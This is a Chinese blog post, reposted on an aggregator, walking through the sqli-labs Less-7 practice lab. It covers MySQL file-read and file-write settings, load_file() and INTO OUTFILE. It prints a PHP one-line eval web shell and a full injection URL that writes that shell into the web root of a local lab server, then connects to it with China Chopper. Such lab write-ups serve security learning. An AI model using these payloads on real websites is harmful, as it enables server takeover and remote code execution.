sqli lab less7

Posted 幸运儿mnmnmn

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了sqli lab less7相关的知识,希望对你有一定的参考价值。

Less7

1.文件读写权限问题

  • show variables like \'%secure%\';查看 secure-file-priv 当前的值,如果显示为NULL,则需要打开
  • C:\\phpstudy\\PHPTutorial\\mysql\\my.ini文件,在其中加上一句:secure_file_priv=“/”。

 

 

 

 

 

 

 

 

 

 

 

重启服务再show  就显示了

 

 

 

   

 

2一句话木马:php版本:<?php @eval($_POST[“crow”]);?> 其中crow是密码

 

一句话木马大多配合中国菜刀使用,菜刀的使用可以参考:https://www.daixiaorui.com/read/17.html

3. load_file()  读取本地文件  select load_file(\'C:\\\\phpstudy\\\\PHPTutorial\\\\WWW\\\\sqli\\\\Less-7\\\\test.txt’);

4. into outfile 写文件                                       

用法: select \'mysql is very good\' into outfile \'test1.txt‘;

                                                                     文件位置: C:\\phpstudy\\\\MySQL\\data

  •   或者是select \'crow 666\' into outfile \'C:\\\\phpstudy\\\\WWW\\\\sqli\\\\Less-7\\\\test.txt’;
  •  
  • 文件位置: C:\\phpstudy\\WWW\\sqli\\Less-7
  • 注意事项: \\\\

 

 

 

 

 

 

 

 

 

 

 

 

有错误  证明存在注入

 

 

 

 

 

之后我们用outfile将一句话木马写入文件,虽然依然显示报错,但是我们发现路径下已经存在了我们想要的文件

http://192.168.50.100/sqli-labs/Less-7/?id=-1\')) union select 1,2,\'<?php @eval($_POST[“crow”]);?>\' into outfile "C:\\\\phpstudy\\\\PHPTutorial\\\\WWW\\\\sqli-labs\\\\Less-7\\\\test.php" --+

 

 

 

 

 

 

使用中国菜刀链接

 

 

 

 

 

 

使用中国菜刀访问即可

以上是关于sqli lab less7的主要内容,如果未能解决你的问题,请参考以下文章

SQLI-LABS的安装

Sqli-labs环境搭建教程(sql注入)

docker安装sqli-labs

sqli-labs靶场搭建

sqli-labs靶场安装

sqli-labs(9-10关)